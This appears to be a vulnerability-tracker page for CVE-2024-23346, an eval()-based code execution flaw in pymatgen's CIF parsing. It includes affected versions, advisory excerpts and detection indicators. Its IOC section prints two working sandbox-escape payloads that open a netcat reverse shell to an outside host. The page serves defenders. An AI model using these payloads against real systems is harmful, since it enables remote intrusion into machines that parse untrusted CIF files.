CVE-2024-23346
published 2024-02-21CVE-2024-23346: Pymatgen (Python Materials Genomics) is an open-source Python library for materials analysis. A critical security vulnerability exists in the…
PriorityP354high7.8CVSS 3.1
AVLACLPRLUINSUCHIHAH
EXPLOIT
EPSS
3.82%
88.7th percentile
Pymatgen (Python Materials Genomics) is an open-source Python library for materials analysis. A critical security vulnerability exists in the `JonesFaithfulTransformation.from_transformation_str()` method within the `pymatgen` library prior to version 2024.2.20. This method insecurely utilizes `eval()` for processing input, enabling execution of arbitrary code when parsing untrusted input. Version 2024.2.20 fixes this issue.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | pymatgen | < pymatgen 2022.11.7+dfsg1-11+deb12u1 (bookworm) | pymatgen 2022.11.7+dfsg1-11+deb12u1 (bookworm) |
| materialsproject | pymatgen | < 2024.2.20 | 2024.2.20 |
| materialsvirtuallab | pymatgen | < 2024.2.20 | 2024.2.20 |
| pymatgen | pymatgen | >= 0 < 2022.11.7+dfsg1-11+deb12u1 | 2022.11.7+dfsg1-11+deb12u1 |
| pymatgen | pymatgen | >= 0 < 2024.1.27+dfsg1-6 | 2024.1.27+dfsg1-6 |
| pymatgen | pymatgen | >= 0 < 2024.2.20 | 2024.2.20 |
Detection & IOCsextracted from sources · hover to see the quote
command[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+ ["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("busybox nc 10.10.14.14 4242 -e /bin/bash");0,0,0↗
command[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+ ["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("nc {ip} {port} -e /bin/bash");0,0,0↗
- →Malicious CIF files exploiting CVE-2024-23346 contain a crafted `_space_group_magn.transform_BNS_Pp_abc` field embedding a Python class-traversal payload to escape the eval() sandbox and execute OS commands. ↗
- →Detect CIF file uploads containing the string `__mro__` or `BuiltinImporter` in the `_space_group_magn.transform_BNS_Pp_abc` field, which is the canonical injection point for this exploit. ↗
- →The exploit audit creation method string `CVE-2024-23346 Pymatgen CIF Parser Reverse Shell Exploit` or `Pymatgen CIF Parser Arbitrary Code Execution Exploit` appears verbatim in malicious CIF files and can be used as a file-content signature. ↗
- →The exploit uses the data block identifier `data_5yOhtAoR` — this static string appears in known PoC CIF files and can serve as a file-content IOC. ↗
- →The vulnerable code path is `JonesFaithfulTransformation.from_transformation_str()` in pymatgen; monitor for pymatgen versions prior to 2024.2.20 parsing externally supplied CIF files. ↗
- ·The reverse-shell IP and port embedded in the payload (`busybox nc 10.10.14.14 4242`) are attacker-controlled and will vary per campaign; do not rely on these specific values for detection. ↗
- ·The exploit triggers only when the application calls `CifParser.parse_structures()` (or equivalent) on an attacker-supplied file; the vulnerability is in parsing, not merely file upload. ↗
CVSS provenance
nvdv3.17.8HIGHCVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
osv7.8HIGH
vendor_debian9.3CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Debian
CVE-2024-23346: pymatgen - Pymatgen (Python Materials Genomics) is an open-source Python library for materi...
vendor_debian·2024·CVSS 9.3
CVE-2024-23346 [CRITICAL] CVE-2024-23346: pymatgen - Pymatgen (Python Materials Genomics) is an open-source Python library for materi...
Pymatgen (Python Materials Genomics) is an open-source Python library for materials analysis. A critical security vulnerability exists in the `JonesFaithfulTransformation.from_transformation_str()` method within the `pymatgen` library prior to version 2024.2.20. This method insecurely utilizes `eval()` for processing input, enabling execution of arbitrary code when parsing untrusted input. Version 2024.2.20 fixes this issue.
Scope: local
bookworm: resolved (fixed in 2022.11.7+dfsg1-11+deb12u1)
sid: resolved (fixed in 2024.1.27+dfsg1-6)
trixie: resolved (fixed in 2024.1.27+dfsg1-6)
OSV
CVE-2024-23346: Pymatgen (Python Materials Genomics) is an open-source Python library for materials analysis
osv·2024-02-21·CVSS 7.8
CVE-2024-23346 [HIGH] CVE-2024-23346: Pymatgen (Python Materials Genomics) is an open-source Python library for materials analysis
Pymatgen (Python Materials Genomics) is an open-source Python library for materials analysis. A critical security vulnerability exists in the `JonesFaithfulTransformation.from_transformation_str()` method within the `pymatgen` library prior to version 2024.2.20. This method insecurely utilizes `eval()` for processing input, enabling execution of arbitrary code when parsing untrusted input. Version 2024.2.20 fixes this issue.
GHSA
pymatgen vulnerable to arbitrary code execution when parsing a maliciously crafted JonesFaithfulTransformation transformation_string
ghsa·2024-02-21
CVE-2024-23346 [CRITICAL] CWE-77 pymatgen vulnerable to arbitrary code execution when parsing a maliciously crafted JonesFaithfulTransformation transformation_string
pymatgen vulnerable to arbitrary code execution when parsing a maliciously crafted JonesFaithfulTransformation transformation_string
### Summary
A critical security vulnerability exists in the `JonesFaithfulTransformation.from_transformation_str()` method within the `pymatgen` library. This method insecurely utilizes eval() for processing input, enabling execution of arbitrary code when parsing untrusted input. This can be exploited when parsing a maliciously-created CIF file.
### Details
The cause of the vulnerability is in [pymatgen/symmetry/settings.py#L97C1-L111C108](https://github.com/materialsproject/pymatgen/blob/master/pymatgen/symmetry/settings.py#L97C1-L111C108). The flawed code segment involves a regular expression operation followed by the use of `eval()`.
#### Vulnerable co
OSV
pymatgen vulnerable to arbitrary code execution when parsing a maliciously crafted JonesFaithfulTransformation transformation_string
osv·2024-02-21
CVE-2024-23346 [CRITICAL] pymatgen vulnerable to arbitrary code execution when parsing a maliciously crafted JonesFaithfulTransformation transformation_string
pymatgen vulnerable to arbitrary code execution when parsing a maliciously crafted JonesFaithfulTransformation transformation_string
### Summary
A critical security vulnerability exists in the `JonesFaithfulTransformation.from_transformation_str()` method within the `pymatgen` library. This method insecurely utilizes eval() for processing input, enabling execution of arbitrary code when parsing untrusted input. This can be exploited when parsing a maliciously-created CIF file.
### Details
The cause of the vulnerability is in [pymatgen/symmetry/settings.py#L97C1-L111C108](https://github.com/materialsproject/pymatgen/blob/master/pymatgen/symmetry/settings.py#L97C1-L111C108). The flawed code segment involves a regular expression operation followed by the use of `eval()`.
#### Vulnerable co
No detection rules found.
https://github.com/materialsproject/pymatgen/blob/master/pymatgen/symmetry/settings.py#L97C1-L111C108https://github.com/materialsproject/pymatgen/commit/c231cbd3d5147ee920a37b6ee9dd236b376bcf5ahttps://github.com/materialsproject/pymatgen/security/advisories/GHSA-vgv8-5cpj-qj2fhttps://github.com/materialsproject/pymatgen/blob/master/pymatgen/symmetry/settings.py#L97C1-L111C108https://github.com/materialsproject/pymatgen/commit/c231cbd3d5147ee920a37b6ee9dd236b376bcf5ahttps://github.com/materialsproject/pymatgen/security/advisories/GHSA-vgv8-5cpj-qj2fhttps://www.vicarius.io/vsociety/posts/critical-security-flaw-in-pymatgen-library-cve-2024-23346
2024-02-21
Published